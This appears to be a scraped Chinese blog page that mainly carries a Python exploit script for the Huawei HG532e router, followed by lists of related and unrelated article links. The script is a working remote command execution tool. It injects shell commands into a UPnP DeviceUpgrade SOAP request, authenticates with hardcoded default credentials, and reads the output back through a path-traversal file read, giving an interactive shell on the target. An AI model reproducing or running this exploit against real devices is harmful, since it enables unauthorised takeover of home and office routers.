#!/bin/python

'''

    Author : Rebellion

    Github : @rebe11ion

    Twitter : @rebellion

'''

import urllib2,requests,os,sys

from requests.auth import HTTPDigestAuth

DEFAULT_HEADERS = {"User-Agent": "Mozilla", }

DEFAULT_TIMEOUT = 5

def fetch_url(url):

    global DEFAULT_HEADERS, DEFAULT_TIMEOUT

    request = urllib2.Request(url, headers=DEFAULT_HEADERS)

    data = urllib2.urlopen(request, timeout=DEFAULT_TIMEOUT).read()

    return data

def exploit(ip, path):

    url = "http://%s:37215/icon/../../../%s" % (ip, path)

    data = fetch_url(url)

    return data

def main():

    pwd = "/"

    cmd_path = "/tmp/ccmd"

    pwd_path = "/tmp/cpwd"

    while True:

       targetip = sys.argv[1]

       cmd_ = raw_input("[{}]$ ".format(pwd))

       cmd = "cd {} ; {} > {} ; pwd > {}".format(pwd,cmd_.split("|")[0],cmd_path,pwd_path)

       rm = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"

       url = "http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1"

       requests.post(url, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)

       assert cmd_path.startswith("/"), "An absolute path is required"

       data = exploit(targetip, cmd_path)

       open(cmd_path,"wb").write(data)

       if "cd" in cmd_:

          pass

       elif "clear" in cmd_:

          os.system("clear")

       elif "cat" in cmd_:

          os.system(cmd_.replace(cmd_.split("cat")[1].split(" ")[1],cmd_path))

       else:

          if "|" in cmd_:

             os.system("cat {} | {}".format(cmd_path,cmd_.split("|")[1]))

          else:

             os.system("cat {}".format(cmd_path))

       pwd = exploit(targetip,pwd_path).strip("\n")

if __name__ == "__main__":

    main()

[EXP]Huawei Router HG532e - Command Execution的更多相关文章

  1. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  4. PowerShell vs. PsExec for Remote Command Execution

    Posted by Jianpeng Mo / January 20, 2014 Monitoring and maintaining large-scale, complex, highly dis ...

  5. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  6. MYSQL报Fatal error encountered during command execution.错误的解决方法

    {MySql.Data.MySqlClient.MySqlException (0x80004005): Fatal error encountered during command executio ...

  7. My SQL和LINQ 实现ROW_NUMBER() OVER以及Fatal error encountered during command execution

    Oracle 和SQL server都有ROW_NUMBER() OVER这个功能函数,主要用于分组排序,而MySQL 却没有 SELECT * FROM (SELECT ROW_NUMBER() O ...

  8. JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution

    CVE ID : CVE-2019-7727 JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution description=========== ...

  9. Fatal error encountered during command execution

    MySQL + .net + EF 开发环境,调用一处sql语句报错: Fatal error encountered during command execution[sql] view plain ...

随机推荐

  1. 初学c# -- c#创建开机自启服调用外部交互式exe文件

    在c#创建的开机自启动服务里,调用外部可执行文件有以下问题:1.带窗口的交互式的exe文件调用后,实际并没有被执行:2.服务是随windows启动的,服务启动后可能windows桌面还没出来,会报错误 ...

  2. cacti的介绍、安装、配置、及维护

    一.cacti的介绍 Cacti 在英文中的意思是仙人掌的意思,Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具.它通过snmpget来获取数据,使用 R ...

  3. python list中append()方法和extend()方法区别

    共同点 只能作用于list类型(不能作用于tuple等其他类型) 单参数限制(不支持多参数) 不同点 list.append(object) 向列表中添加一个对象object. 使用append的时候 ...

  4. input中用中文输入法下的全角·替换英文输入法下的句号.

    核心语句 <input type="text" onkeyup="this.value=this.value.replace(/\./g, '·')" o ...

  5. .net C# 利用Session防重复点击防重复提交

    <body>    <form id="form1" runat="server">    <div>        < ...

  6. pythonj基础(五)元组和集合

    一,什么是元祖 Python的元组与列表类似,不同之处在于元组的元素不能修改. 元组使用小括号,列表使用方括号. 元组创建很简单,只需要在括号中添加元素,并使用逗号隔开即可. 1.创建一个空元组 tu ...

  7. SpringMVC学习 十三 拦截器栈

    拦截器栈:就是有多个拦截器同时拦截相同的控制器(controller)请求,这写拦截器就构成了拦截器栈. 栈的特点是先进后出,在拦截器栈中也是如此,如果先执行了preHandle方法,也就是意味着先进 ...

  8. java web+模板

    这次测试需要在java web的基础上套入模板,在测试的过程中我遇到了许多问题,现在我可以使用模板来美化网页的许多格式.但是模板的许多代码我还是看不懂,其中有jquery的许多代码.在今后我会学习相关 ...

  9. 移动端300ms延迟解决的几种方法;

    方案一:禁用缩放 当HTML文档头部包含如下meta标签时: <meta name="viewport" content="user-scalable=no&quo ...

  10. Solidity合约记录——(一)如何寻找以太坊真实Solidity源码

    在自主学习Solidity智能合约的过程中,第一份入手资料无疑是官方文档.感谢前辈们还能提供出文档的中文翻译,作为我入门的第一手资料:文末附上有用的学习链接{持续更新中} 阅读完基础文档同时上手合约后 ...